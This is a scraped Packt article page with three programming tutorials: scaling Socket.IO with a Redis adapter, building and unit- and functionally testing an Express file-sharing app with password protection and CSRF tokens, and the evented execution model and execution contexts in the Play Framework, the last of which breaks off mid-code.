index.js, present in packtchatsocket.io. Add the following code to the variable declarations: Var redisAdapter = require('socket.io-redis'); An application state is a flexible idea. We can store the application state locally. This is done when the state does not need to be shared. A simple example is keeping the path to a local temp file. When the data will be needed by multiple connections, then it must be put into a shared space. Anything with a user's session will need to be shared, for example. The next thing we need to do is add some code to our startIo function. The following code is what our startIo function should look like: exports.startIo = function startIo(server){io = io.listen(server);io.adapter(redisAdapter({host: config.redisHost, port: config.redisPort}));var packtchat = io.of('/packtchat');packtchat.use(socketAuth);packtchat.on('connection', socketConnection);return io;}; The first thing is to start the server listening. Next, we will call io.set, which allows us to set configuration options. We create a new redisStore and set all the Redis attributes (redisPub, redisSub, and redisClient) to a new Redis client connection. The Redis client takes a port and the hostname. Socket.IO inner workings We are not going to completely dive into everything that Socket.IO does, but we will discuss a few topics. WebSockets This is what makes Socket.IO work. All web servers serve HTTP, that is, what makes them web servers. This works great when all you want to do is serve pages. These pages are served based on requests. The browser must ask for information before receiving it. If you want to have real-time connections, though, it is difficult and requires some workaround. HTTP was not designed to have the server initiate the request. This is where WebSockets come in. WebSockets allow the server and client to create a connection and keep it open. Inside of this connection, either side can send messages back and forth. This is what Socket.IO (technically, Engine.io) leverages to create real-time communication. Socket.IO even has fallbacks if you are using a browser that does not support WebSockets. The browsers that do support WebSockets at the time of writing include the latest versions of Chrome, Firefox, Safari, Safari on iOS, Opera, and IE 11. This means the browsers that do not support WebSockets are all the older versions of IE. Socket.IO will use different techniques to simulate a WebSocket connection. This involves creating an Ajax request and keeping the connection open for a long time. If data needs to be sent, it will send it in an Ajax request. Eventually, that request will close and the client will immediately create another request. Socket.IO even has an Adobe Flash implementation if you have to support really old browsers (IE 6, for example). It is not enabled by default. WebSockets also are a little different when scaling our application. Because each WebSocket creates a persistent connection, we may need more servers to handle Socket.IO traffic then regular HTTP. For example, when someone connects and chats for an hour, there will have only been one or two HTTP requests. In contrast, a WebSocket will have to be open for the entire hour. The way our code base is written, we can easily scale up more Socket.IO servers by themselves. Ideas to take away from this article The first takeaway is that for every emit, there needs to be an on. This is true whether the sender is the server or the client. It is always best to sit down and map out each event and which direction it is going. The next idea is that of note, which entails building our app out of loosely coupled modules. Our app.js kicks everything that deals with Express off. Then, it fires the startIo function. While it does pass over an object, we could easily create one and use that. Socket.IO just wants a basic HTTP server. In fact, you can just pass the port, which is what we used in our first couple of Socket.IO applications (Ping-Pong). If we wanted to create an application layer of Socket.IO servers, we could refactor this code out and have all the Socket.IO servers run on separate servers other than Express. Summary At this point, we should feel comfortable about using real-time events in Socket.IO. We should also know how to namespace our io server and create groups of users. We also learned how to authorize socket connections to only allow logged-in users to connect. Resources for Article: Further resources on this subject: Exploring streams [article] Working with Data Access and File Formats Using Node.js [article] So, what is Node.js? [article]
Read more
  • 0
  • 0
  • 15430
Unlock access to the largest independent learning library in Tech for FREE!
Get unlimited access to 7500+ expert-authored eBooks and video courses covering every tech area you can think of.
Renews at €14.99/month. Cancel anytime
article-image-improving-code-quality
Packt
22 Sep 2014
18 min read
Save for later

Improving Code Quality

Packt
22 Sep 2014
18 min read
In this article by Alexandru Vlăduţu, author of Mastering Web Application Development with Express, we are going to see how to test Express applications and how to improve the code quality of our code by leveraging existing NPM modules. (For more resources related to this topic, see here.) Creating and testing an Express file-sharing application Now, it's time to see how to develop and test an Express application with what we have learned previously. We will create a file-sharing application that allows users to upload files and password-protect them if they choose to. After uploading the files to the server, we will create a unique ID for that file, store the metadata along with the content (as a separate JSON file), and redirect the user to the file's information page. When trying to access a password-protected file, an HTTP basic authentication pop up will appear, and the user will have to only enter the password (no username in this case). The package.json file, so far, will contain the following code: { "name": "file-uploading-service", "version": "0.0.1", "private": true, "scripts": { "start": "node ./bin/www" }, "dependencies": { "express": "~4.2.0", "static-favicon": "~1.0.0", "morgan": "~1.0.0", "cookie-parser": "~1.0.1", "body-parser": "~1.0.0", "debug": "~0.7.4", "ejs": "~0.8.5", "connect-multiparty": "~1.0.5", "cuid": "~1.2.4", "bcrypt": "~0.7.8", "basic-auth-connect": "~1.0.0", "errto": "~0.2.1", "custom-err": "0.0.2", "lodash": "~2.4.1", "csurf": "~1.2.2", "cookie-session": "~1.0.2", "secure-filters": "~1.0.5", "supertest": "~0.13.0", "async": "~0.9.0" }, "devDependencies": { } } When bootstrapping an Express application using the CLI, a /bin/www file will be automatically created for you. The following is the version we have adopted to extract the name of the application from the package.json file. This way, in case we decide to change it we won't have to alter our debugging code because it will automatically adapt to the new name, as shown in the following code: #!/usr/bin/env node var pkg = require('../package.json'); var debug = require('debug')(pkg.name + ':main'); var app = require('../app'); app.set('port', process.env.PORT || 3000); var server = app.listen(app.get('port'), function() { debug('Express server listening on port ' + server.address().port); }); The application configurations will be stored inside config.json: { "filesDir": "files", "maxSize": 5 } The properties listed in the preceding code refer to the files folder (where the files will be updated), which is relative to the root and the maximum allowed file size. The main file of the application is named app.js and lives in the root. We need the connect-multiparty module to support file uploads, and the csurf and cookie-session modules for CSRF protection. The rest of the dependencies are standard and we have used them before. The full code for the app.js file is as follows: var express = require('express'); var path = require('path'); var favicon = require('static-favicon'); var logger = require('morgan'); var cookieParser = require('cookie-parser'); var session = require('cookie-session'); var bodyParser = require('body-parser'); var multiparty = require('connect-multiparty'); var Err = require('custom-err'); var csrf = require('csurf'); var ejs = require('secure-filters').configure(require('ejs')); var csrfHelper = require('./lib/middleware/csrf-helper'); var homeRouter = require('./routes/index'); var filesRouter = require('./routes/files'); var config = require('./config.json'); var app = express(); var ENV = app.get('env'); // view engine setup app.engine('html', ejs.renderFile); app.set('views', path.join(__dirname, 'views')); app.set('view engine', 'html'); app.use(favicon()); app.use(bodyParser.json()); app.use(bodyParser.urlencoded()); // Limit uploads to X Mb app.use(multiparty({ maxFilesSize: 1024 * 1024 * config.maxSize })); app.use(cookieParser()); app.use(session({ keys: ['rQo2#0s!qkE', 'Q.ZpeR49@9!szAe'] })); app.use(csrf()); // add CSRF helper app.use(csrfHelper); app.use('/', homeRouter); app.use('/files', filesRouter); app.use(express.static(path.join(__dirname, 'public'))); /// catch 404 and forward to error handler app.use(function(req, res, next) { next(Err('Not Found', { status: 404 })); }); /// error handlers // development error handler // will print stacktrace if (ENV === 'development') { app.use(function(err, req, res, next) { res.status(err.status || 500); res.render('error', { message: err.message, error: err }); }); } // production error handler // no stacktraces leaked to user app.use(function(err, req, res, next) { res.status(err.status || 500); res.render('error', { message: err.message, error: {} }); }); module.exports = app; Instead of directly binding the application to a port, we are exporting it, which makes our lives easier when testing with supertest. We won't need to care about things such as the default port availability or specifying a different port environment variable when testing. To avoid having to create the whole input when including the CSRF token, we have created a helper for that inside lib/middleware/csrf-helper.js: module.exports = function(req, res, next) { res.locals.csrf = function() { return "<input type='hidden' name='_csrf' value='" + req.csrfToken() + "' />"; } next(); }; For the password–protection functionality, we will use the bcrypt module and create a separate file inside lib/hash.js for the hash generation and password–compare functionality: var bcrypt = require('bcrypt'); var errTo = require('errto'); var Hash = {}; Hash.generate = function(password, cb) { bcrypt.genSalt(10, errTo(cb, function(salt) { bcrypt.hash(password, salt, errTo(cb, function(hash) { cb(null, hash); })); })); }; Hash.compare = function(password, hash, cb) { bcrypt.compare(password, hash, cb); }; module.exports = Hash; The biggest file of our application will be the file model, because that's where most of the functionality will reside. We will use the cuid() module to create unique IDs for files, and the native fs module to interact with the filesystem. The following code snippet contains the most important methods for models/file.js: function File(options, id) { this.id = id || cuid(); this.meta = _.pick(options, ['name', 'type', 'size', 'hash', 'uploadedAt']); this.meta.uploadedAt = this.meta.uploadedAt || new Date(); }; File.prototype.save = function(path, password, cb) { var _this = this; this.move(path, errTo(cb, function() { if (!password) { return _this.saveMeta(cb); } hash.generate(password, errTo(cb, function(hashedPassword) { _this.meta.hash = hashedPassword; _this.saveMeta(cb); })); })); }; File.prototype.move = function(path, cb) { fs.rename(path, this.path, cb); }; For the full source code of the file, browse the code bundle. Next, we will create the routes for the file (routes/files.js), which will export an Express router. As mentioned before, the authentication mechanism for password-protected files will be the basic HTTP one, so we will need the basic-auth-connect module. At the beginning of the file, we will include the dependencies and create the router: var express = require('express'); var basicAuth = require('basic-auth-connect'); var errTo = require('errto'); var pkg = require('../package.json'); var File = require('../models/file'); var debug = require('debug')(pkg.name + ':filesRoute'); var router = express.Router(); We will have to create two routes that will include the id parameter in the URL, one for displaying the file information and another one for downloading the file. In both of these cases, we will need to check if the file exists and require user authentication in case it's password-protected. This is an ideal use case for the router.param() function because these actions will be performed each time there is an id parameter in the URL. The code is as follows: router.param('id', function(req, res, next, id) { File.find(id, errTo(next, function(file) { debug('file', file); // populate req.file, will need it later req.file = file; if (file.isPasswordProtected()) { // Password – protected file, check for password using HTTP basic auth basicAuth(function(user, pwd, fn) { if (!pwd) { return fn(); } // ignore user file.authenticate(pwd, errTo(next, function(match) { if (match) { return fn(null, file.id); } fn(); })); })(req, res, next); } else { // Not password – protected, proceed normally next(); } })); }); The rest of the routes are fairly straightforward, using response.download() to send the file to the client, or using response.redirect() after uploading the file: router.get('/', function(req, res, next) { res.render('files/new', { title: 'Upload file' }); }); router.get('/:id.html', function(req, res, next) { res.render('files/show', { id: req.params.id, meta: req.file.meta, isPasswordProtected: req.file.isPasswordProtected(), hash: hash, title: 'Download file ' + req.file.meta.name }); }); router.get('/download/:id', function(req, res, next) { res.download(req.file.path, req.file.meta.name); }); router.post('/', function(req, res, next) { var tempFile = req.files.file; if (!tempFile.size) { return res.redirect('/files'); } var file = new File(tempFile); file.save(tempFile.path, req.body.password, errTo(next, function() { res.redirect('/files/' + file.id + '.html'); })); }); module.exports = router; The view for uploading a file contains a multipart form with a CSRF token inside (views/files/new.html): <%- include ../layout/header.html %> <form action="/files" method="POST" enctype="multipart/form-data"> <div class="form-group"> <label>Choose file:</label> <input type="file" name="file" /> </div> <div class="form-group"> <label>Password protect (leave blank otherwise):</label> <input type="password" name="password" /> </div> <div class="form-group"> <%- csrf() %> <input type="submit" /> </div> </form> <%- include ../layout/footer.html %> To display the file's details, we will create another view (views/files/show.html). Besides showing the basic file information, we will display a special message in case the file is password-protected, so that the client is notified that a password should also be shared along with the link: <%- include ../layout/header.html %> <p> <table> <tr> <th>Name</th> <td><%= meta.name %></td> </tr> <th>Type</th> <td><%= meta.type %></td> </tr> <th>Size</th> <td><%= meta.size %> bytes</td> </tr> <th>Uploaded at</th> <td><%= meta.uploadedAt %></td> </tr> </table> </p> <p> <a href="/files/download/<%- id %>">Download file</a> | <a href="/files">Upload new file</a> </p> <p> To share this file with your friends use the <a href="/files/<%- id %>">current link</a>. <% if (isPasswordProtected) { %> <br /> Don't forget to tell them the file password as well! <% } %> </p> <%- include ../layout/footer.html %> Running the application To run the application, we need to install the dependencies and run the start script: $ npm i $ npm start The default port for the application is 3000, so if we visit http://localhost:3000/files, we should see the following page: After uploading the file, we should be redirected to the file's page, where its details will be displayed: Unit tests Unit testing allows us to test individual parts of our code in isolation and verify their correctness. By making our tests focused on these small components, we decrease the complexity of the setup, and most likely, our tests should execute faster. Using the following command, we'll install a few modules to help us in our quest: $ npm i mocha should sinon––save-dev We are going to write unit tests for our file model, but there's nothing stopping us from doing the same thing for our routes or other files from /lib. The dependencies will be listed at the top of the file (test/unit/file-model.js): var should = require('should'); var path = require('path'); var config = require('../../config.json'); var sinon = require('sinon'); We will also need to require the native fs module and the hash module, because these modules will be stubbed later on. Apart from these, we will create an empty callback function and reuse it, as shown in the following code: // will be stubbing methods on these modules later on var fs = require('fs'); var hash = require('../../lib/hash'); var noop = function() {}; The tests for the instance methods will be created first: describe('models', function() { describe('File', function() { var File = require('../../models/file'); it('should have default properties', function() { var file = new File(); file.id.should.be.a.String; file.meta.uploadedAt.should.be.a.Date; }); it('should return the path based on the root and the file id', function() { var file = new File({}, '1'); file.path.should.eql(File.dir + '/1'); }); it('should move a file', function() { var stub = sinon.stub(fs, 'rename'); var file = new File({}, '1'); file.move('/from/path', noop); stub.calledOnce.should.be.true; stub.calledWith('/from/path', File.dir + '/1', noop).should.be.true; stub.restore(); }); it('should save the metadata', function() { var stub = sinon.stub(fs, 'writeFile'); var file = new File({}, '1'); file.meta = { a: 1, b: 2 }; file.saveMeta(noop); stub.calledOnce.should.be.true; stub.calledWith(File.dir + '/1.json', JSON.stringify(file.meta), noop).should.be.true; stub.restore(); }); it('should check if file is password protected', function() { var file = new File({}, '1'); file.meta.hash = 'y'; file.isPasswordProtected().should.be.true; file.meta.hash = null; file.isPasswordProtected().should.be.false; }); it('should allow access if matched file password', function() { var stub = sinon.stub(hash, 'compare'); var file = new File({}, '1'); file.meta.hash = 'hashedPwd'; file.authenticate('password', noop); stub.calledOnce.should.be.true; stub.calledWith('password', 'hashedPwd', noop).should.be.true; stub.restore(); }); We are stubbing the functionalities of the fs and hash modules because we want to test our code in isolation. Once we are done with the tests, we restore the original functionality of the methods. Now that we're done testing the instance methods, we will go on to test the static ones (assigned directly onto the File object): describe('.dir', function() { it('should return the root of the files folder', function() { path.resolve(__dirname + '/../../' + config.filesDir).should.eql(File.dir); }); }); describe('.exists', function() { var stub; beforeEach(function() { stub = sinon.stub(fs, 'exists'); }); afterEach(function() { stub.restore(); }); it('should callback with an error when the file does not exist', function(done) { File.exists('unknown', function(err) { err.should.be.an.instanceOf(Error).and.have.property('status', 404); done(); }); // call the function passed as argument[1] with the parameter `false` stub.callArgWith(1, false); }); it('should callback with no arguments when the file exists', function(done) { File.exists('existing-file', function(err) { (typeof err === 'undefined').should.be.true; done(); }); // call the function passed as argument[1] with the parameter `true` stub.callArgWith(1, true); }); }); }); }); To stub asynchronous functions and execute their callback, we use the stub.callArgWith() function provided by sinon, which executes the callback provided by the argument with the index <<number>> of the stub with the subsequent arguments. For more information, check out the official documentation at http://sinonjs.org/docs/#stubs. When running tests, Node developers expect the npm test command to be the command that triggers the test suite, so we need to add that script to our package.json file. However, since we are going to have different tests to be run, it would be even better to add a unit-tests script and make npm test run that for now. The scripts property should look like the following code: "scripts": { "start": "node ./bin/www", "unit-tests": "mocha --reporter=spec test/unit", "test": "npm run unit-tests" }, Now, if we run the tests, we should see the following output in the terminal: Functional tests So far, we have tested each method to check whether it works fine on its own, but now, it's time to check whether our application works according to the specifications when wiring all the things together. Besides the existing modules, we will need to install and use the following ones: supertest: This is used to test the routes in an expressive manner cheerio: This is used to extract the CSRF token out of the form and pass it along when uploading the file rimraf: This is used to clean up our files folder once we're done with the testing We will create a new file called test/functional/files-routes.js for the functional tests. As usual, we will list our dependencies first: var fs = require('fs'); var request = require('supertest'); var should = require('should'); var async = require('async'); var cheerio = require('cheerio'); var rimraf = require('rimraf'); var app = require('../../app'); There will be a couple of scenarios to test when uploading a file, such as: Checking whether a file that is uploaded without a password can be publicly accessible Checking that a password-protected file can only be accessed with the correct password We will create a function called uploadFile that we can reuse across different tests. This function will use the same supertest agent when making requests so it can persist the cookies, and will also take care of extracting and sending the CSRF token back to the server when making the post request. In case a password argument is provided, it will send that along with the file. The function will assert that the status code for the upload page is 200 and that the user is redirected to the file page after the upload. The full code of the function is listed as follows: function uploadFile(agent, password, done) { agent .get('/files') .expect(200) .end(function(err, res) { (err == null).should.be.true; var $ = cheerio.load(res.text); var csrfToken = $('form input[name=_csrf]').val(); csrfToken.should.not.be.empty; var req = agent .post('/files') .field('_csrf', csrfToken) .attach('file', __filename); if (password) { req = req.field('password', password); } req .expect(302) .expect('Location', /files/(.*).html/) .end(function(err, res) { (err == null).should.be.true; var fileUid = res.headers['location'].match(/files/(.*).html/)[1]; done(null, fileUid); }); }); } Note that we will use rimraf in an after function to clean up the files folder, but it would be best to have a separate path for uploading files while testing (other than the one used for development and production): describe('Files-Routes', function(done) { after(function() { var filesDir = __dirname + '/../../files'; rimraf.sync(filesDir); fs.mkdirSync(filesDir); When testing the file uploads, we want to make sure that without providing the correct password, access will not be granted to the file pages: describe("Uploading a file", function() { it("should upload a file without password protecting it", function(done) { var agent = request.agent(app); uploadFile(agent, null, done); }); it("should upload a file and password protect it", function(done) { var agent = request.agent(app); var pwd = 'sample-password'; uploadFile(agent, pwd, function(err, filename) { async.parallel([ function getWithoutPwd(next) { agent .get('/files/' + filename + '.html') .expect(401) .end(function(err, res) { (err == null).should.be.true; next(); }); }, function getWithPwd(next) { agent .get('/files/' + filename + '.html') .set('Authorization', 'Basic ' + new Buffer(':' + pwd).toString('base64')) .expect(200) .end(function(err, res) { (err == null).should.be.true; next(); }); } ], function(err) { (err == null).should.be.true; done(); }); }); }); }); }); It's time to do the same thing we did for the unit tests: make a script so we can run them with npm by using npm run functional-tests. At the same time, we should update the npm test script to include both our unit tests and our functional tests: "scripts": { "start": "node ./bin/www", "unit-tests": "mocha --reporter=spec test/unit", "functional-tests": "mocha --reporter=spec --timeout=10000 --slow=2000 test/functional", "test": "npm run unit-tests && npm run functional-tests" } If we run the tests, we should see the following output: Running tests before committing in Git It's a good practice to run the test suite before committing to git and only allowing the commit to pass if the tests have been executed successfully. The same applies for other version control systems. To achieve this, we should add the .git/hooks/pre-commit file, which should take care of running the tests and exiting with an error in case they failed. Luckily, this is a repetitive task (which can be applied to all Node applications), so there is an NPM module that creates this hook file for us. All we need to do is install the pre-commit module (https://www.npmjs.org/package/pre-commit) as a development dependency using the following command: $ npm i pre-commit ––save-dev This should automatically create the pre-commit hook file so that all the tests are run before committing (using the npm test command). The pre-commit module also supports running custom scripts specified in the package.json file. For more details on how to achieve that, read the module documentation at https://www.npmjs.org/package/pre-commit. Summary In this article, we have learned about writing tests for Express applications and in the process, explored a variety of helpful modules. Resources for Article: Further resources on this subject: Web Services Testing and soapUI [article] ExtGWT Rich Internet Application: Crafting UI Real Estate [article] Rendering web pages to PDF using Railo Open Source [article]
Read more
  • 0
  • 0
  • 1437

article-image-handling-long-running-requests-play
Packt
22 Sep 2014
18 min read
Save for later

Handling Long-running Requests in Play

Packt
22 Sep 2014
18 min read
In this article by Julien Richard-Foy, author of Play Framework Essentials, we will dive in the framework internals and explain how to leverage its reactive programming model to manipulate data streams. (For more resources related to this topic, see here.) Firstly, I would like to mention that the code called by controllers must be thread-safe. We also noticed that the result of calling an action has type Future[Result] rather than just Result. This article explains these subtleties and gives answers to questions such as "How are concurrent requests processed by Play applications?" More precisely, this article presents the challenges of stream processing and the way the Play framework solves them. You will learn how to consume, produce, and transform data streams in a non-blocking way using the Iteratee library. Then, you will leverage these skills to stream results and push real-time notifications to your clients. By the end of the article, you will be able to do the following: Produce, consume, and transform streams of data Process a large request body chunk by chunk Serve HTTP chunked responses Push real-time notifications using WebSockets or server-sent events Manage the execution context of your code Play application's execution model The streaming programming model provided by Play has been influenced by the execution model of Play applications, which itself has been influenced by the nature of the work a web application performs. So, let's start from the beginning: what does a web application do? For now, our example application does the following: the HTTP layer invokes some business logic via the service layer, and the service layer does some computations by itself and also calls the database layer. It is worth noting that in our configuration, the database system runs on the same machine as the web application but this is, however, not a requirement. In fact, there are chances that in real-world projects, your database system is decoupled from your HTTP layer and that both run on different machines. It means that while a query is executed on the database, the web layer does nothing but wait for the response. Actually, the HTTP layer is often waiting for some response coming from another system; it could, for example, retrieve some data from an external web service, or the business layer itself could be located on a remote machine. Decoupling the HTTP layer from the business layer or the persistence layer gives a finer control on how to scale the system (more details about that are given further in this article). Anyway, the point is that the HTTP layer may essentially spend time waiting. With that in mind, consider the following diagram showing how concurrent requests could be executed by a web application using a threaded execution model. That is, a model where each request is processed in its own thread.  Threaded execution model Several clients (shown on the left-hand side in the preceding diagram) perform queries that are processed by the application's controller. On the right-hand side of the controller, the figure shows an execution thread corresponding to each action's execution. The filled rectangles represent the time spent performing computations within a thread (for example, for processing data or computing a result), and the lines represent the time waiting for some remote data. Each action's execution is distinguished by a particular color. In this fictive example, the action handling the first request may execute a query to a remote database, hence the line (illustrating that the thread waits for the database result) between the two pink rectangles (illustrating that the action performs some computation before querying the database and after getting the database result). The action handling the third request may perform a call to a distant web service and then a second one, after the response of the first one has been received; hence, the two lines between the green rectangles. And the action handling the last request may perform a call to a distant web service that streams a response of an infinite size, hence, the multiple lines between the purple rectangles. The problem with this execution model is that each request requires the creation of a new thread. Threads have an overhead at creation, because they consume memory (essentially because each thread has its own stack), and during execution, when the scheduler switches contexts. However, we can see that these threads spend a lot of time just waiting. If we could use the same thread to process another request while the current action is waiting for something, we could avoid the creation of threads, and thus save resources. This is exactly what the execution model used by Play—the evented execution model—does, as depicted in the following diagram: Evented execution model Here, the computation fragments are executed on two threads only. Note that the same action can have its computation fragments run by different threads (for example, the pink action). Also note that several threads are still in use, that's why the code must be thread-safe. The time spent waiting between computing things is the same as before, and you can see that the time required to completely process a request is about the same as with the threaded model (for instance, the second pink rectangle ends at the same position as in the earlier figure, same for the third green rectangle, and so on). A comparison between the threaded and evented models can be found in the master's thesis of Benjamin Erb, Concurrent Programming for Scalable Web Architectures, 2012. An online version is available at http://berb.github.io/diploma-thesis/. An attentive reader may think that I have cheated; the rectangles in the second figure are often thinner than their equivalent in the first figure. That's because, in the first model, there is an overhead for scheduling threads and, above all, even if you have a lot of threads, your machine still has a limited number of cores effectively executing the code of your threads. More precisely, if you have more threads than your number of cores, you necessarily have threads in an idle state (that is, waiting). This means, if we suppose that the machine executing the application has only two cores, in the first figure, there is even time spent waiting in the rectangles! Scaling up your server The previous section raises the question of how to handle a higher number of concurrent requests, as depicted in the following diagram: A server under an increasing load The previous section explained how to avoid wasting resources to leverage the computing power of your server. But actually, there is no magic; if you want to compute even more things per unit of time, you need more computing power, as depicted in the following diagram: Scaling using more powerful hardware One solution could be to have a more powerful server. But you could be smarter than that and avoid buying expensive hardware by studying the shape of the workload and make appropriate decisions at the software-level. Indeed, there are chances that your workload varies a lot over time, with peaks and holes of activity. This information suggests that if you wanted to buy more powerful hardware, its performance characteristics would be drawn by your highest activity peak, even if it occurs very occasionally. Obviously, this solution is not optimal because you would buy expensive hardware even if you actually needed it only one percent of the time (and more powerful hardware often also means more power-consuming hardware). A better way to handle the workload elasticity consists of adding or removing server instances according to the activity level, as depicted in the following diagram: Scaling using several server instances This architecture design allows you to finely (and dynamically) tune your server capacity according to your workload. That's actually the cloud computing model. Nevertheless, this architecture has a major implication on your code; you cannot assume that subsequent requests issued by the same client will be handled by the same server instance. In practice, it means that you must treat each request independently of each other; you cannot for instance, store a counter on a server instance to count the number of requests issued by a client (your server would miss some requests if one is routed to another server instance). In a nutshell, your server has to be stateless. Fortunately, Play is stateless, so as long as you don't explicitly have a mutable state in your code, your application is stateless. Note that the first implementation I gave of the shop was not stateless; indeed the state of the application was stored in the server's memory. Embracing non-blocking APIs In the first section of this article, I claimed the superiority of the evented execution model over the threaded execution model, in the context of web servers. That being said, to be fair, the threaded model has an advantage over the evented model: it is simpler to program with. Indeed, in such a case, the framework is responsible for creating the threads and the JVM is responsible for scheduling the threads, so that you don't even have to think about this at all, yet your code is concurrently executed. On the other hand, with the evented model, concurrency control is explicit and you should care about it. Indeed, the fact that the same execution thread is used to run several concurrent actions has an important implication on your code: it should not block the thread. Indeed, while the code of an action is executed, no other action code can be concurrently executed on the same thread. What does blocking mean? It means holding a thread for too long a duration. It typically happens when you perform a heavy computation or wait for a remote response. However, we saw that these cases, especially waiting for remote responses, are very common in web servers, so how should you handle them? You have to wait in a non-blocking way or implement your heavy computations as incremental computations. In all the cases, you have to break down your code into computation fragments, where the execution is managed by the execution context. In the diagram illustrating the evented execution model, computation fragments are materialized by the rectangles. You can see that rectangles of different colors are interleaved; you can find rectangles of another color between two rectangles of the same color. However, by default, the code you write forms a single block of execution instead of several computation fragments. It means that, by default, your code is executed sequentially; the rectangles are not interleaved! This is depicted in the following diagram: Evented execution model running blocking code The previous figure still shows both the execution threads. The second one handles the blue action and then the purple infinite action, so that all the other actions can only be handled by the first execution context. This figure illustrates the fact that while the evented model can potentially be more efficient than the threaded model, it can also have negative consequences on the performances of your application: infinite actions block an execution thread forever and the sequential execution of actions can lead to much longer response times. So, how can you break down your code into blocks that can be managed by an execution context? In Scala, you can do so by wrapping your code in a Future block: Future { // This is a computation fragment} The Future API comes from the standard Scala library. For Java users, Play provides a convenient wrapper named play.libs.F.Promise: Promise.promise(() -> {// This is a computation fragment}); Such a block is a value of type Future[A] or, in Java, Promise<A> (where A is the type of the value computed by the block). We say that these blocks are asynchronous because they break the execution flow; you have no guarantee that the block will be sequentially executed before the following statement. When the block is effectively evaluated depends on the execution context implementation that manages it. The role of an execution context is to schedule the execution of computation fragments. In the figure showing the evented model, the execution context consists of a thread pool containing two threads (represented by the two lines under the rectangles). Actually, each time you create an asynchronous value, you have to supply the execution context that will manage its evaluation. In Scala, this is usually achieved using an implicit parameter of type ExecutionContext. You can, for instance, use an execution context provided by Play that consists, by default, of a thread pool with one thread per processor: import play.api.libs.concurrent.Execution.Implicits.defaultContext In Java, this execution context is automatically used by default, but you can explicitly supply another one: Promise.promise(() -> { ... }, myExecutionContext); Now that you know how to create asynchronous values, you need to know how to manipulate them. For instance, a sequence of several Future blocks is concurrently executed; how do we define an asynchronous computation depending on another one? You can eventually schedule a computation after an asynchronous value has been resolved using the foreach method: val futureX = Future { 42 }futureX.foreach(x => println(x)) In Java, you can perform the same operation using the onRedeem method: Promise<Integer> futureX = Promise.promise(() -> 42);futureX.onRedeem((x) -> System.out.println(x)); More interestingly, you can eventually transform an asynchronous value using the map method: val futureIsEven = futureX.map(x => x % 2 == 0) The map method exists in Java too: Promise<Boolean> futureIsEven = futureX.map((x) -> x % 2 == 0); If the function you use to transform an asynchronous value returned an asynchronous value too, you would end up with an inconvenient Future[Future[A]] value (or a Promise<Promise<A>> value, in Java). So, use the flatMap method in that case: val futureIsEven = futureX.flatMap(x => Future { x % 2 == 0 }) The flatMap method is also available in Java: Promise<Boolean> futureIsEven = futureX.flatMap((x) -> {Promise.promise(() -> x % 2 == 0)}); The foreach, map, and flatMap functions (or their Java equivalent) all have in common to set a dependency between two asynchronous values; the computation they take as the parameter is always evaluated after the asynchronous computation they are applied to. Another method that is worth mentioning is zip: val futureXY: Future[(Int, Int)] = futureX.zip(futureY) The zip method is also available in Java: Promise<Tuple<Integer, Integer>> futureXY = futureX.zip(futureY); The zip method returns an asynchronous value eventually resolved to a tuple containing the two resolved asynchronous values. It can be thought of as a way to join two asynchronous values without specifying any execution order between them. If you want to join more than two asynchronous values, you can use the zip method several times (for example, futureX.zip(futureY).zip(futureZ).zip(…)), but an alternative is to use the Future.sequence function: val futureXs: Future[Seq[Int]] =Future.sequence(Seq(futureX, futureY, futureZ, …)) This function transforms a sequence of future values into a future sequence value. In Java, this function is named Promise.sequence. In the preceding descriptions, I always used the word eventually, and it has a reason. Indeed, if we use an asynchronous value to manipulate a result sent by a remote machine (such as a database system or a web service), the communication may eventually fail due to some technical issue (for example, if the network is down). For this reason, asynchronous values have error recovery methods; for example, the recover method: futureX.recover { case NonFatal(e) => y } The recover method is also available in Java: futureX.recover((throwable) -> y); The previous code resolves futureX to the value of y in the case of an error. Libraries performing remote calls (such as an HTTP client or a database client) return such asynchronous values when they are implemented in a non-blocking way. You should always be careful whether the libraries you use are blocking or not and keep in mind that, by default, Play is tuned to be efficient with non-blocking APIs. It is worth noting that JDBC is blocking. It means that the majority of Java-based libraries for database communication are blocking. Obviously, once you get a value of type Future[A] (or Promise<A>, in Java), there is no way to get the A value unless you wait (and block) for the value to be resolved. We saw that the map and flatMap methods make it possible to manipulate the future A value, but you still end up with a Future[SomethingElse] value (or a Promise<SomethingElse>, in Java). It means that if your action's code calls an asynchronous API, it will end up with a Future[Result] value rather than a Result value. In that case, you have to use Action.async instead of Action, as illustrated in this typical code example: val asynchronousAction = Action.async { implicit request =>  service.asynchronousComputation().map(result => Ok(result))} In Java, there is nothing special to do; simply make your method return a Promise<Result> object: public static Promise<Result> asynchronousAction() { service.asynchronousComputation().map((result) -> ok(result));} Managing execution contexts Because Play uses explicit concurrency control, controllers are also responsible for using the right execution context to run their action's code. Generally, as long as your actions do not invoke heavy computations or blocking APIs, the default execution context should work fine. However, if your code is blocking, it is recommended to use a distinct execution context to run it. An application with two execution contexts (represented by the black and grey arrows). You can specify in which execution context each action should be executed, as explained in this section Unfortunately, there is no non-blocking standard API for relational database communication (JDBC is blocking). It means that all our actions that invoke code executing database queries should be run in a distinct execution context so that the default execution context is not blocked. This distinct execution context has to be configured according to your needs. In the case of JDBC communication, your execution context should be a thread pool with as many threads as your maximum number of connections. The following diagram illustrates such a configuration: This preceding diagram shows two execution contexts, each with two threads. The execution context at the top of the figure runs database code, while the default execution context (on the bottom) handles the remaining (non-blocking) actions. In practice, it is convenient to use Akka to define your execution contexts as they are easily configurable. Akka is a library used for building concurrent, distributed, and resilient event-driven applications. This article assumes that you have some knowledge of Akka; if that is not the case, do some research on it. Play integrates Akka and manages an actor system that follows your application's life cycle (that is, it is started and shut down with the application). For more information on Akka, visit http://akka.io. Here is how you can create an execution context with a thread pool of 10 threads, in your application.conf file: jdbc-execution-context {thread-pool-executor {   core-pool-size-factor = 10.0   core-pool-size-max = 10}} You can use it as follows in your code: import play.api.libs.concurrent.Akkaimport play.api.Play.currentimplicit val jdbc =  Akka.system.dispatchers.lookup("jdbc-execution-context") The Akka.system expression retrieves the actor system managed by Play. Then, the execution context is retrieved using Akka's API. The equivalent Java code is the following: import play.libs.Akka;import akka.dispatch.MessageDispatcher;import play.core.j.HttpExecutionContext;MessageDispatcher jdbc =   Akka.system().dispatchers().lookup("jdbc-execution-context"); Note that controllers retrieve the current request's information from a thread-local static variable, so you have to attach it to the execution context's thread before using it from a controller's action: play.core.j.HttpExecutionContext.fromThread(jdbc) Finally, forcing the use of a specific execution context for a given action can be achieved as follows (provided that my.execution.context is an implicit execution context): import my.execution.contextval myAction = Action.async {Future { … }} The Java equivalent code is as follows: public static Promise<Result> myAction() {return Promise.promise(   () -> { … },   